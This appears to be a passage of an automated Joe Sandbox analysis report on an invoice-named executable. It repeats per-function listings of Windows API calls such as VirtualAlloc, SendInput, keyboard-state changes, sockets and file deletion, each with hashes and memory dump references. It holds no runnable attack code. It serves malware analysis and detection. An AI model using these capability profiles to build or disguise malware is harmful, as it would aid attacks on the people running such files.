                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                          • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                          • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                          • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                          Function 00441714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LocalTime__swprintf
                                          • String ID: %.3d$WIN_XPe
                                          • API String ID: 2070861257-2409531811
                                          • Opcode ID: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                                          • Instruction ID: f51e3ac8fae6d8955d529539db48231027d4147bdd6b48c6978ef66e561906ab
                                          • Opcode Fuzzy Hash: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                                          • Instruction Fuzzy Hash: D2D01271844118FAD7109B9098898F9737CA708301F600563B512A2050E23E9BD6E62E
                                          Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                          • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                          • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                          • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                          Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                          • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                            • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                          • _memmove.LIBCMT ref: 0047E314
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: a7ed02eeed9676c8fcd00d37da31e49e87575bae2c78420ee5dd29f87526a4dd
                                          • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                          • Opcode Fuzzy Hash: a7ed02eeed9676c8fcd00d37da31e49e87575bae2c78420ee5dd29f87526a4dd
                                          • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                          Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 004780C3
                                          • CoUninitialize.OLE32 ref: 004780CE
                                            • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                          • VariantInit.OLEAUT32(?), ref: 004780D9
                                          • VariantClear.OLEAUT32(?), ref: 004783AA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: 0f625460e1d8066da09c67e41f27514c9fba90c2366d23154bb5826f9ef884b6
                                          • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                          • Opcode Fuzzy Hash: 0f625460e1d8066da09c67e41f27514c9fba90c2366d23154bb5826f9ef884b6
                                          • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                          Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: 9292484c7ffc42eea317217bf5d4e68703bd19dcc1dd3ea756c411c8d1f4197a
                                          • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                          • Opcode Fuzzy Hash: 9292484c7ffc42eea317217bf5d4e68703bd19dcc1dd3ea756c411c8d1f4197a
                                          • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                          Function 004897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(00C71D00,?), ref: 00489863
                                          • ScreenToClient.USER32(00000002,00000002), ref: 00489896
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                                          • Instruction ID: e3f881a7cdcc43810cee46c2a40b043201eea1d37e41385612dd6f56ef4f9ac2
                                          • Opcode Fuzzy Hash: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                                          • Instruction Fuzzy Hash: 6B513E74A00609AFCB10EF54C884ABE7BB5FF45360F14866EF855AB3A0D734AD91CB94
                                          Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorLast$__itow__swprintfsocket
                                          • String ID:
                                          • API String ID: 2214342067-0
                                          • Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                          • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                          • Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                          • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                          Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                          • _strlen.LIBCMT ref: 004764D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID:
                                          • API String ID: 4218353326-0
                                          • Opcode ID: f92aa70265d8cfa8456904e3018b373e308ad2a6be4037779746b4cd516bab6c
                                          • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                          • Opcode Fuzzy Hash: f92aa70265d8cfa8456904e3018b373e308ad2a6be4037779746b4cd516bab6c
                                          • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                          Function 0046B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
                                          • GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                                          • Instruction ID: 5b86d2e11fb278bd4ab993ead48be06bf9d9dcf949e57147c6f090c5708de813
                                          • Opcode Fuzzy Hash: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                                          • Instruction Fuzzy Hash: C441097A600610DFCB11EF15C444A59BBE1EF49314F05C0AAEC4AAB3A2DB38FD45CB99
                                          Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                          • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                          • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                          • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                          Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 0048AB60
                                          • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                          • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                          • MessageBeep.USER32(00000000), ref: 0048AC57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                          • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                          • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                          • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                          Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                          • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                          • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                          • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                          Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                          • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                          • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                          • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                          • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                          Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                          • __isleadbyte_l.LIBCMT ref: 00436229
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                          • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                          • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                          • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                          Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00484F02
                                            • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                            • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                            • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                          • GetCaretPos.USER32(?), ref: 00484F13
                                          • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                          • GetForegroundWindow.USER32 ref: 00484F54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
